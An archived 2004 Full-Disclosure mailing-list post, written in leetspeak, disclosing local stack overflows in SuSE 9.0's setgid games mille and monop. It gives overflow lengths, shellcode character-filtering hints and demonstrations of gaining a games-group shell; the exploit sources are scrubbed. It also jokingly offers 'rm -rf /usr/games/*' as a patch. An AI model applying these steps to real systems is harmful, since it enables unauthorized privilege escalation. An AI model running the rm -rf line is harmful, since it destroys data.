| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: narkotix at linuxmail.org (narko tix)
Subject: Suse 9.0 Multiple gid = 20(games) vulnz
----- S3CTI0N 0x01 -----
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
Pr0gr4m suid3d t0 games wi7h d3f4ul7.
-3xpl0i747i0n : 0x01-) m4nu4l-) 112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n.
us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.
0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b' ,'\n', '\x90','\220' ch4r4ct3rs.
XOR them.'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220.
Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:
addicted@...s:~/c-hell$ ./env
RET = ???
addicted@...s:~/c-hell$ /usr/games/mille
--HAND-- --DECK-- | ---- ---- -----
P 89 | Hand Total 0 0
1 75 --DISCARD-- | ----- -----
2 Go | Overall Total 0 0
3 Gasoline | Games 0 0
4 Repairs file: ??? ??? ??? ?|
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| p: pick q: quit
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| u: use # o: order hand
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| d: discard # s: save
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?| w: toggle window r: reprint
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? ?|
?? ??? ??? ??? ??? ??? ??? ??? ??? ??? sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)
----- S3CTI0N 0x02 -----
-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w.7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
0v3rfl0w in 1. pl4y3rn4m3.(4ls0 th3 0th3rs)
Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n : 0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n.
Us3 y0ur ASCII r3t 4ddr3ss.
0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them.
3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
addicted@...s:~/c-hell$ ./env
RET = ???
addicted@...s:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name: ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ??? ???
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$
----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz.Bu7 I'm t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
--------------------------------------------------------------------------------------------------------------------------------------
N4rK07IX
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
-------------- next part --------------
A non-text attachment was scrubbed...
Name: mille.c
Type: application/octet-stream
Size: 5845 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040417/3990f704/mille.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: monopexp.c
Type: application/octet-stream
Size: 5063 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040417/3990f704/monopexp.obj
Powered by blists - more mailing lists